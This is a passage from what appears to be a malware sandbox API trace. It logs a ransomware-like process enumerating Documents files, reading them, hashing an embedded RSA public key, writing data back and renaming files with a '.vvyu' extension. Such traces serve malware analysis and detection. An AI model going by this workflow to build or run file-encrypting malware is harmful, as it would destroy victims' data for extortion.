dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.447] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.448] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.448] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.448] CloseHandle (hObject=0x584) returned 1 [0189.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af1f88 [0189.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.451] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\RUCPVLyvfQF00IxB1.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\rucpvlyvfqf00ixb1.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\RUCPVLyvfQF00IxB1.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\rucpvlyvfqf00ixb1.xlsx.vvyu")) returned 1 [0189.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.452] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0189.456] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x655f5690, ftCreationTime.dwHighDateTime=0x1d83d29, ftLastAccessTime.dwLowDateTime=0x66b790, ftLastAccessTime.dwHighDateTime=0x1d86ce2, ftLastWriteTime.dwLowDateTime=0x66b790, ftLastWriteTime.dwHighDateTime=0x1d86ce2, nFileSizeHigh=0x0, nFileSizeLow=0x18753, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tCNlSe zbuiw.pptx", cAlternateFileName="TCNLSE~1.PPT")) returned 1 [0189.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d10 [0189.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2d10 | out: hHeap=0x2c0000) returned 1 [0189.456] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\tCNlSe zbuiw.pptx") returned=".pptx" [0189.456] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\tCNlSe zbuiw.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\tcnlse zbuiw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.458] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=100179) returned 1 [0189.458] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.461] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1872d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.461] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.463] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.463] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18753, lpOverlapped=0x0) returned 1 [0189.464] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.465] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.466] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.466] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.466] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.466] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.466] GetLastError () returned 0x0 [0189.466] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.466] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.466] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.466] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.466] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18750) returned 0x2af5168 [0189.467] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d10 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d58 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.468] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db68 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.470] GetCurrentThreadId () returned 0x5d8 [0189.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4608 [0189.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.471] GetCurrentThreadId () returned 0x5d8 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2d58 | out: hHeap=0x2c0000) returned 1 [0189.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: 